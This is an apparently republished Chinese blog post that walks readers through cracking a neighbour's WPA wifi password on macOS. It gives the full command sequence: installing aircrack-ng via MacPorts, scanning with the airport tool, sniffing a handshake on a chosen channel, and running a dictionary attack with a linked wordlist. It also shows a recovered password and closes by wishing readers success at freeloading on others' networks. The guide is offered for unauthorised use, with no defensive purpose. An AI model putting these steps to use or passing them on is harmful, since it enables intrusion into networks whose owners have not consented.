出差第二天,住的小区因为疫情被封,宿舍又没有wifi,看着附近满满的WIFI信号列表,wifi万能钥匙却一个都连接不上,心中一万匹CNM。。。于是电脑连上手机热点,然后各种折腾,终于破解了一个隔壁的wifi密码。
准备工作
1.电脑:MacBook Pro (本机系统版本为 macOS Catalina 10.15.6 )
2.下载软件:MacPorts,然后安装(提醒:安装时断网,不然极有可能卡死)
3.更新MacPorts,打开终端,输入命令(两次):
sudo port selfupdate
下载安装MacPorts可参考:https://www.cnblogs.com/Mateo-dengmin/p/15855168.html
4.更新完成后,安装aircrack-ng,输入命令:
sudo port install aircrack-ng
5.Mac系统自带WIFI工具:airport,运行该工具,该程序的路径默认为:/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport,可以直接运行也可以在终端输入命令来运行
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s
SSID 是 wifi名称,RSSI 是信号强度,CHANNEL 是信道。效果如下:
6.下载wifi密码字典(多种可供选择)
链接:https://pan.baidu.com/s/1uSHL7PVbLqkZZqAZhb6Epw 密码: gl1t
7.获取本机网卡信息,输入命令:
ifconfig
本机电脑网卡为 en0
破解开始
1.获取握手包,开始抓包,en0为电脑网卡,13为监听的信道,命令如下:
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport en0 sniff 13
2.监听之后,Wi-Fi图标会变化,使用ctrl+c停止监听,系统会将监听到的数据cap文件保存到本地/tmp文件夹下。打开cap文件,查看cap文件中的数据是否被抓取到,输入命令查看:
sudo aircrack-ng /tmp/airportSniffhKI8Kg.cap
如果要查询的路由列表的 Encryption中(0 handshake)是抓包失败,(1 handshake)则是抓包成功,否者要回到第1步重新抓取。(抓包时需要刚好这段时间有人重新连接了wifi才能抓到 WPA(1 handshake)的数据)
3.进入字典所在目录(进入个人存放wifi密码字典目录)
cd ~/Documents/wifi
4.开始破解,dic.txt 为字典文件,/tmp/airportSniffhKI8Kg.cap为抓取到的握手包,命令如下:
sudo aircrack-ng -w dic.txt /tmp/airportSniffhKI8Kg.cap
效果如下:
提示「Index number of target network ?」时,输入 Encryption 中为(1 handshake)数据的行号,这里输入730。
等待破解结果…,中断破解过程可以直接按 command + c 组合键退出。破解过程所需时间长短受电脑硬件配置、字典体积大小的影响。如果dic.txt字典破解失败,则可以换其它字典进行破解,直到破解成功。
5.如果破解成功则会如下图所示:
这里破解出来的密码为:b36tm772
最后,祝大家都能蹭网成功!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/13307.html